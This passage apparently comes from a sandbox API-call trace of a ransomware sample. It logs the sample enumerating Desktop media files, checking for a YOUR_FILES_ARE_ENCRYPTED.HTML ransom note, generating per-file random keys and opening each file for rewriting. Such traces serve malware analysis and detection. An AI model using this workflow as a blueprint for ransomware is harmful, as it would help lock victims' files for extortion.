dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.610] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6748fc0, ftCreationTime.dwHighDateTime=0x1d7087c, ftLastAccessTime.dwLowDateTime=0x3c7b7430, ftLastAccessTime.dwHighDateTime=0x1d7097b, ftLastWriteTime.dwLowDateTime=0x3c7b7430, ftLastWriteTime.dwHighDateTime=0x1d7097b, nFileSizeHigh=0x0, nFileSizeLow=0x12671, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="BFIiB5rgA.mp3", cAlternateFileName="BFIIB5~1.MP3")) returned 1 [0123.610] StrStrIW (lpFirst="BFIiB5rgA.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.610] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\BFIiB5rgA.mp3") returned 47 [0123.610] PathFindExtensionW (pszPath="BFIiB5rgA.mp3") returned=".mp3" [0123.610] lstrlenW (lpString=".mp3") returned 4 [0123.610] PathFindExtensionW (pszPath="BFIiB5rgA.mp3") returned=".mp3" [0123.610] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\BFIiB5rgA.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bfiib5rga.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0123.611] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=75377) returned 1 [0123.611] GetProcessHeap () returned 0x600000 [0123.611] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0123.614] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="CA") returned 2 [0123.614] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="C7") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="2E") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="89") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="0F") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="19") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="1E") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="AB") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="34") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="28") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="EB") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="4B") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="74") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="02") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="32") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="36") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="B7") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="80") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="D1") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="5E") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="ED") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="33") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="4C") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="37") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="E9") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="80") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="54") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="EB") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="68") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="28") returned 2 [0123.614] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="59") returned 2 [0123.615] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="6A") returned 2 [0123.615] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\BFIiB5rgA.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\BFIiB5rgA.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\BFIiB5rgA.mp3" [0123.615] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.615] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0123.619] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaefe890, ftCreationTime.dwHighDateTime=0x1d70243, ftLastAccessTime.dwLowDateTime=0xbc457130, ftLastAccessTime.dwHighDateTime=0x1d70920, ftLastWriteTime.dwLowDateTime=0xbc457130, ftLastWriteTime.dwHighDateTime=0x1d70920, nFileSizeHigh=0x0, nFileSizeLow=0x89f6, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="CEn4AMxs4C.mp3", cAlternateFileName="CEN4AM~1.MP3")) returned 1 [0123.619] StrStrIW (lpFirst="CEn4AMxs4C.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.619] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\CEn4AMxs4C.mp3") returned 48 [0123.619] PathFindExtensionW (pszPath="CEn4AMxs4C.mp3") returned=".mp3" [0123.619] lstrlenW (lpString=".mp3") returned 4 [0123.619] PathFindExtensionW (pszPath="CEn4AMxs4C.mp3") returned=".mp3" [0123.619] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\CEn4AMxs4C.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cen4amxs4c.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0123.620] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=35318) returned 1 [0123.620] GetProcessHeap () returned 0x600000 [0123.620] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0123.621] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="C9") returned 2 [0123.621] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="5B") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="B2") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="D4") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="08") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="BD") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="4E") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="1F") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="C7") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="2F") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="FB") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="CC") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="60") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="66") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="25") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="3F") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="E1") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="B6") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="94") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="31") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="8C") returned 2 [0123.621] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="87") returned 2 [0123.622] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="69") returned 2 [0123.622] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="A1") returned 2 [0123.622] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="2E") returned 2 [0123.622] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="0C") returned 2 [0123.622] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="93") returned 2 [0123.622] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="AE") returned 2 [0123.622] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="64") returned 2 [0123.622] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="97") returned 2 [0123.622] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="42") returned 2 [0123.622] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="01") returned 2 [0123.622] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\CEn4AMxs4C.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\CEn4AMxs4C.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\CEn4AMxs4C.mp3" [0123.622] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.622] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0123.626] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x384abb40, ftCreationTime.dwHighDateTime=0x1d706e8, ftLastAccessTime.dwLowDateTime=0xae85cbe0, ftLastAccessTime.dwHighDateTime=0x1d70857, ftLastWriteTime.dwLowDateTime=0xae85cbe0, ftLastWriteTime.dwHighDateTime=0x1d70857, nFileSizeHigh=0x0, nFileSizeLow=0x174dd, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="CQzG.flv", cAlternateFileName="")) returned 1 [0123.626] StrStrIW (lpFirst="CQzG.flv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.627] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\CQzG.flv") returned 42 [0123.627] PathFindExtensionW (pszPath="CQzG.flv") returned=".flv" [0123.627] lstrlenW (lpString=".flv") returned 4 [0123.627] PathFindExtensionW (pszPath="CQzG.flv") returned=".flv" [0123.627] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\CQzG.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cqzg.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0123.627] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=95453) returned 1 [0123.627] GetProcessHeap () returned 0x600000 [0123.627] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0123.628] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="81") returned 2 [0123.628] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="2D") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="E4") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="7C") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="C5") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="79") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="2A") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="A9") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="94") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="1B") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="4F") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="96") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="13") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="E0") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="86") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="F0") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="C4") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="BB") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="A5") returned 2 [0123.628] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="45") returned 2 [0123.629] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="52") returned 2 [0123.629] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="77") returned 2 [0123.629] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="BC") returned 2 [0123.629] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="49") returned 2 [0123.629] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="C3") returned 2 [0123.629] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="8A") returned 2 [0123.629] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="89") returned 2 [0123.629] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="6F") returned 2 [0123.629] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="06") returned 2 [0123.629] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="AB") returned 2 [0123.629] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="65") returned 2 [0123.629] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="5B") returned 2 [0123.629] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\CQzG.flv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\CQzG.flv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\CQzG.flv" [0123.629] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.629] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0123.633] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d973700, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0x6d973700, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x8dc4f700, ftLastWriteTime.dwHighDateTime=0x1d73476, nFileSizeHigh=0x0, nFileSizeLow=0x11c00, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="CUsersGrujaDesktopca5751036a12d0.exe", cAlternateFileName="CUSERS~1.EXE")) returned 1 [0123.633] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a6e410, ftCreationTime.dwHighDateTime=0x1d6fab8, ftLastAccessTime.dwLowDateTime=0x3a4f0d60, ftLastAccessTime.dwHighDateTime=0x1d6facc, ftLastWriteTime.dwLowDateTime=0x3a4f0d60, ftLastWriteTime.dwHighDateTime=0x1d6facc, nFileSizeHigh=0x0, nFileSizeLow=0x122ab, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="d5r9a3TBEbl.wav", cAlternateFileName="D5R9A3~1.WAV")) returned 1 [0123.633] StrStrIW (lpFirst="d5r9a3TBEbl.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.633] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\d5r9a3TBEbl.wav") returned 49 [0123.633] PathFindExtensionW (pszPath="d5r9a3TBEbl.wav") returned=".wav" [0123.633] lstrlenW (lpString=".wav") returned 4 [0123.633] PathFindExtensionW (pszPath="d5r9a3TBEbl.wav") returned=".wav" [0123.633] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\d5r9a3TBEbl.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d5r9a3tbebl.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0123.634] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=74411) returned 1 [0123.634] GetProcessHeap () returned 0x600000 [0123.634] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0123.635] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="D1") returned 2 [0123.635] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="5C") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="D9") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="EA") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="F2") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="BB") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="FA") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="85") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="BF") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="09") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="76") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="14") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="78") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="C4") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="14") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="23") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="32") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="B1") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="CC") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="F4") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="E3") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="2B") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="E3") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="7B") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="69") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="EC") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="07") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="5E") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="68") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="AC") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="7E") returned 2 [0123.635] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="76") returned 2 [0123.636] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\d5r9a3TBEbl.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\d5r9a3TBEbl.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\d5r9a3TBEbl.wav" [0123.636] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.636] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0123.640] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0123.640] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.640] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini") returned 45 [0123.640] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0123.640] lstrlenW (lpString=".ini") returned 4 [0123.640] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0123.640] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0123.640] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=282) returned 1 [0123.640] CloseHandle (hObject=0x320) returned 1 [0123.640] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b98ba40, ftCreationTime.dwHighDateTime=0x1d6fb62, ftLastAccessTime.dwLowDateTime=0x3e56a480, ftLastAccessTime.dwHighDateTime=0x1d6fbe0, ftLastWriteTime.dwLowDateTime=0x3e56a480, ftLastWriteTime.dwHighDateTime=0x1d6fbe0, nFileSizeHigh=0x0, nFileSizeLow=0xad1c, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="E7Lvy1u_zoxz.gif", cAlternateFileName="E7LVY1~1.GIF")) returned 1 [0123.641] StrStrIW (lpFirst="E7Lvy1u_zoxz.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.641] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\E7Lvy1u_zoxz.gif") returned 50 [0123.641] PathFindExtensionW (pszPath="E7Lvy1u_zoxz.gif") returned=".gif" [0123.641] lstrlenW (lpString=".gif") returned 4 [0123.641] PathFindExtensionW (pszPath="E7Lvy1u_zoxz.gif") returned=".gif" [0123.641] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\E7Lvy1u_zoxz.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\e7lvy1u_zoxz.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0123.641] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=44316) returned 1 [0123.641] GetProcessHeap () returned 0x600000 [0123.641] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0123.642] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="AC") returned 2 [0123.642] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="6F") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="4E") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="EE") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="3B") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="94") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="56") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="A5") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="C5") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="1E") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="50") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="83") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="11") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="6C") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="97") returned 2 